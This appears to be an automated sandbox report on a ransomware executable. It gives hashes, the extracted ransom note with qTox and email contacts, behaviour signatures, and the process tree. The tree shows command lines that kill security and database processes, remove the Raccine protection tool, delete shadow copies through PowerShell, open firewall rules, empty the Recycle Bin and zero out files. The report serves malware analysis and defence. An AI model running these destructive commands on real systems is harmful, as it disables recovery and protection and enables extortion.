Analysis

  • max time kernel
    118s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    29-10-2021 15:49

General

  • Target

    c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

  • Size

    203KB

  • MD5

    cefd366a2c000d9bbbd35dfd0a73311d

  • SHA1

    0864171c1e033067b04317979803d97f1c90c85b

  • SHA256

    c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c

  • SHA512

    5f43b27b0495afb6ded495816405efe4a0d77b9991f56b7bfd09cd56d3ae890ec8dc2461a1806b2131edeaafc15d3478b471d1ef0376f9f78128eff539451040

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\HOW_TO_RECOVER_MY_FILES.txt

Ransom Note
ALL YOUR FILES HAS BEEN ENCRYPTED! ALL YOUR FILES HAVE NOW THE .LOCKED EXTENSION! TO DE-CRYPT YOUR FILES, CONTACT US HERE: 1- Download qTox >>> https://tox.chat/download.html 2- Install qTox and make a profile, after you have done this: 3- Use this TOX-ID (Copy + Paste): FF45ED6FCE4433D273E34DA1C22AC1B0290973082BE068066D5EDF6C62EF39500A691BDE33B9 and make a friend request, after 5 minutes, you will be in contact with our negotiator. If you want proof, attach 2-3 encrypted files together with the Key ID (you can find the Key-ID in the How-To-Recover-My-Files document on your Desktop,) less then 5Mb each, non-archived and your files should not contain valuable information, like Databases, back-ups, large excel sheets, etc. You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail! Alternatively, please get in touch with the negotiator at the following email address: [email protected] Key Identifier: LjqyEfdX+jDDhC1aV62UQ5a6cCb1cZuUgN8e29VcKpyy9AL/OMcz9OSgswuWxkJPfxKIqqDjfCJeGm4LD3BIX+cUVdAd4+f5mc0KOoWxSTmJ4psJ5uPUqOdPXo5SkWzQBDxR4QVZ0JDdlGj974yH5UpDQAuU6f8RQ39IBFe2sUzhywIPEQE6EKUEXiNVjKKkZ0d4oeAxDTj6xbVJZEHqM+hxA40Smdr7J/Io3AqlLesGRXDR2fL9SXblR5FoQpWQRDKTjWgDOG4/U4XsCHPX7nvkeXMEPdZJhGV+HGMRLPBhy+uqoYMZQLn7lksgm4Yln/FhJ5LobgEQXZoAt3Du6QizlzPbtiqCDtfbaZ3AfBoo9B4g98N/XO5QsfRiZo7sWD4kQGJGTtUPFRNTJTOddS32u6jAFO/ZhoVrgs+wKBnQql0qaCH3rn/WxKiiXBMvzT69/BUIiiMkonv0qDlZEcbajIhoKTOxJLyVrUPOfzU6aSfbCgZhsd/s5AKFegirzC1wm6E14uh5U6300Wpex81/g+UdGgCyVU19Y/6+ADFLq3idJlZM2X+Sw6gu8i2xgKmRomRrvCIcd0bSx4H/fpy3dXycVxS/TUhniWiaoKboyIl20t1LfWN+JiDz2JB1hn9rpe/ISEu07WLjoxaQjh98aqnEBvRLsJ+o0EOJOpE=
URLs

https://tox.chat/download.html

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Downloads PsExec from SysInternals website 1 IoCs

    Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
    "C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Enumerates connected drives
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:464
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1188
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:1068
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:1064
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1828
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:840
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
              PID:1672
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config FDResPub start= auto
              2⤵
                PID:2032
              • C:\Windows\SysWOW64\sc.exe
                "sc.exe" config SSDPSRV start= auto
                2⤵
                  PID:1756
                • C:\Windows\SysWOW64\sc.exe
                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                  2⤵
                    PID:2036
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SstpSvc start= disabled
                    2⤵
                      PID:1112
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config upnphost start= auto
                      2⤵
                        PID:928
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config SQLWriter start= disabled
                        2⤵
                          PID:908
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:952
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1592
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM synctime.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1768
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1556
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM Ntrtscan.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1060
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1916
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM isqlplussvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1728
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqbcoreservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:984
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1940
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM onenote.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1628
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM firefoxconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1712
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM encsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1716
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM excel.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1688
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM agntsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1776
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbeng50.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1076
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM PccNTMon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1920
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM CNTAoSMgr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1924
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msaccess.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1164
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat64.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:888
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1504
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlwriter.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1680
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocomm.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1292
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM infopath.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:912
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM outlook.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1612
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM steam.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1228
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tbirdconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1588
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mbamtray.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1908
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tmlisten.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1496
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" IM thunderbird.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1912
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM wordpad.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1044
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbsnmp.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2032
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msftesql.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:888
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM zoolz.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1828
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld-opt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1164
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM powerpnt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1548
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM xfssvccon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:288
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocautoupds.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:548
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1112
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocssd.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2024
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM visio.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1916
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM oracle.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1476
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlagent.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1376
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1888
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlbrowser.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1724
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM winword.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1676
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlservr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1276
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld-nt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1768
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                          2⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1060
                        • C:\Windows\SysWOW64\netsh.exe
                          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                          2⤵
                            PID:1556
                          • C:\Windows\SysWOW64\netsh.exe
                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                            2⤵
                              PID:1900
                            • C:\Windows\SysWOW64\arp.exe
                              "arp" -a
                              2⤵
                                PID:1472
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                2⤵
                                  PID:1064
                                • C:\Windows\SysWOW64\netsh.exe
                                  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                  2⤵
                                    PID:1168
                                  • C:\Windows\SysWOW64\netsh.exe
                                    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                    2⤵
                                      PID:1908
                                    • C:\Windows\SysWOW64\arp.exe
                                      "arp" -a
                                      2⤵
                                        PID:912
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES.hta
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Modifies Internet Explorer settings
                                        • Modifies system certificate store
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        PID:828
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                        2⤵
                                          PID:1124
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 127.0.0.7 -n 3
                                            3⤵
                                            • Runs ping.exe
                                            PID:1232
                                          • C:\Windows\SysWOW64\fsutil.exe
                                            fsutil file setZeroData offset=0 length=524288 “%s”
                                            3⤵
                                              PID:1496
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
                                            2⤵
                                            • Deletes itself
                                            PID:948
                                            • C:\Windows\SysWOW64\choice.exe
                                              choice /C Y /N /D Y /T 3
                                              3⤵
                                                PID:1448

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                            MD5

                                            687ae6550ed383971dc73960557b129b

                                            SHA1

                                            36990185d9836d6561d7e5b9070e6a5b31ae1fbf

                                            SHA256

                                            5426a906dafe18e00fe69ff5db0af77845286c36d7c7a005d86b1679bc092863

                                            SHA512

                                            8c8e8244c3012fe495a1f9765c520642e1340030cfc75b8aa113a14e7be918e2f08f1349ef380dcf8fd96d0fab7cef7cc3df15c2da86e4a5a5c66fe47d92b69c

                                          • C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES.hta

                                            MD5

                                            e4abaa6cb7fcb6494eda9767448c4f2d

                                            SHA1

                                            ccd1126a5c7e4f803f4677482560552b10e57142

                                            SHA256

                                            dea0770f1a67c30fb659634a2b7477fafe64cd5381e9eca21fca12c45ae54821

                                            SHA512

                                            ff0e547382ab73ff9af44f2afc28b69bca07626c9b6218de2d3ca7bac5c19c9f02963b2fe530184d5331425b84522dfb8f1c0d2898e08699fbb3c32cc603ea95

                                          • memory/288-104-0x0000000000000000-mapping.dmp

                                          • memory/464-57-0x00000000040D0000-0x00000000040D1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/464-55-0x00000000003A0000-0x00000000003A1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/548-106-0x0000000000000000-mapping.dmp

                                          • memory/840-62-0x0000000000000000-mapping.dmp

                                          • memory/888-101-0x0000000000000000-mapping.dmp

                                          • memory/888-87-0x0000000000000000-mapping.dmp

                                          • memory/908-69-0x0000000000000000-mapping.dmp

                                          • memory/912-92-0x0000000000000000-mapping.dmp

                                          • memory/928-68-0x0000000000000000-mapping.dmp

                                          • memory/952-70-0x0000000000000000-mapping.dmp

                                          • memory/984-77-0x0000000000000000-mapping.dmp

                                          • memory/1044-99-0x0000000000000000-mapping.dmp

                                          • memory/1060-117-0x0000000000000000-mapping.dmp

                                          • memory/1060-119-0x00000000024A0000-0x00000000030EA000-memory.dmp

                                            Filesize

                                            12.3MB

                                          • memory/1060-74-0x0000000000000000-mapping.dmp

                                          • memory/1060-118-0x0000000075F41000-0x0000000075F43000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1064-60-0x0000000000000000-mapping.dmp

                                          • memory/1064-125-0x0000000000000000-mapping.dmp

                                          • memory/1068-59-0x0000000000000000-mapping.dmp

                                          • memory/1076-84-0x0000000000000000-mapping.dmp

                                          • memory/1112-67-0x0000000000000000-mapping.dmp

                                          • memory/1112-107-0x0000000000000000-mapping.dmp

                                          • memory/1164-103-0x0000000000000000-mapping.dmp

                                          • memory/1164-88-0x0000000000000000-mapping.dmp

                                          • memory/1188-58-0x0000000000000000-mapping.dmp

                                          • memory/1228-94-0x0000000000000000-mapping.dmp

                                          • memory/1276-115-0x0000000000000000-mapping.dmp

                                          • memory/1292-91-0x0000000000000000-mapping.dmp

                                          • memory/1376-111-0x0000000000000000-mapping.dmp

                                          • memory/1472-124-0x0000000000000000-mapping.dmp

                                          • memory/1476-110-0x0000000000000000-mapping.dmp

                                          • memory/1496-97-0x0000000000000000-mapping.dmp

                                          • memory/1504-89-0x0000000000000000-mapping.dmp

                                          • memory/1548-105-0x0000000000000000-mapping.dmp

                                          • memory/1556-120-0x0000000000000000-mapping.dmp

                                          • memory/1556-73-0x0000000000000000-mapping.dmp

                                          • memory/1588-95-0x0000000000000000-mapping.dmp

                                          • memory/1592-71-0x0000000000000000-mapping.dmp

                                          • memory/1612-93-0x0000000000000000-mapping.dmp

                                          • memory/1628-79-0x0000000000000000-mapping.dmp

                                          • memory/1672-63-0x0000000000000000-mapping.dmp

                                          • memory/1676-114-0x0000000000000000-mapping.dmp

                                          • memory/1680-90-0x0000000000000000-mapping.dmp

                                          • memory/1688-82-0x0000000000000000-mapping.dmp

                                          • memory/1712-80-0x0000000000000000-mapping.dmp

                                          • memory/1716-81-0x0000000000000000-mapping.dmp

                                          • memory/1724-113-0x0000000000000000-mapping.dmp

                                          • memory/1728-76-0x0000000000000000-mapping.dmp

                                          • memory/1756-65-0x0000000000000000-mapping.dmp

                                          • memory/1768-72-0x0000000000000000-mapping.dmp

                                          • memory/1768-116-0x0000000000000000-mapping.dmp

                                          • memory/1776-83-0x0000000000000000-mapping.dmp

                                          • memory/1828-61-0x0000000000000000-mapping.dmp

                                          • memory/1828-102-0x0000000000000000-mapping.dmp

                                          • memory/1888-112-0x0000000000000000-mapping.dmp

                                          • memory/1900-122-0x0000000000000000-mapping.dmp

                                          • memory/1908-96-0x0000000000000000-mapping.dmp

                                          • memory/1912-98-0x0000000000000000-mapping.dmp

                                          • memory/1916-75-0x0000000000000000-mapping.dmp

                                          • memory/1916-109-0x0000000000000000-mapping.dmp

                                          • memory/1920-85-0x0000000000000000-mapping.dmp

                                          • memory/1924-86-0x0000000000000000-mapping.dmp

                                          • memory/1940-78-0x0000000000000000-mapping.dmp

                                          • memory/2024-108-0x0000000000000000-mapping.dmp

                                          • memory/2032-64-0x0000000000000000-mapping.dmp

                                          • memory/2032-100-0x0000000000000000-mapping.dmp

                                          • memory/2036-66-0x0000000000000000-mapping.dmp